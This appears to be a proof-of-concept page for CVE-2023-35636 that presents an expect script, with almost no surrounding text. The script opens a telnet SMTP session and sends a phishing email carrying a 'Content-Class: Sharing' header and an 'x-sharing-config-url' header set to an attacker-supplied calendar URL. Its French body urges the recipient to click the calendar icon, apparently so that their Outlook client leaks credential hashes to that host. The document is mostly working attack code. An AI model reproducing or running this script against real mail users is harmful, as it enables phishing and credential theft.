CVE-2023-35636 – CVE Helper

README.md

Rendering markdown...

POC / cve-2023-35636.sh SH

⬇ Raw GitHub ✕ Close

#!/usr/bin/expect

set timeout -1

set host [lindex $argv 0]
set port [lindex $argv 1]
set from [lindex $argv 2]
set rcpt [lindex $argv 3]
set calendar [lindex $argv 4]

spawn telnet $host $port

expect "220"
send "HELO $host\r"

expect "250"
send "MAIL FROM: <$from>\r"

expect "250"
send "RCPT TO: <$rcpt>\r"

expect "250"
send "data\r"

expect "354"
send "From: $from\r"
sleep 1
send "To: $rcpt\r"
sleep 1
send "Subject: Rdv important (evil inside)\r"
sleep 1
send "Content-Class: Sharing\r"
sleep 1
send "x-sharing-config-url: $calendar\r"
sleep 1
send "\r"
sleep 1
send "Merci de cliquer sur la petite icone de calendier en haut a gauche quand vous lisez ce message. \r"
sleep 1
send "\r"
sleep 1
send ".\r"
sleep 1

send "quit\r"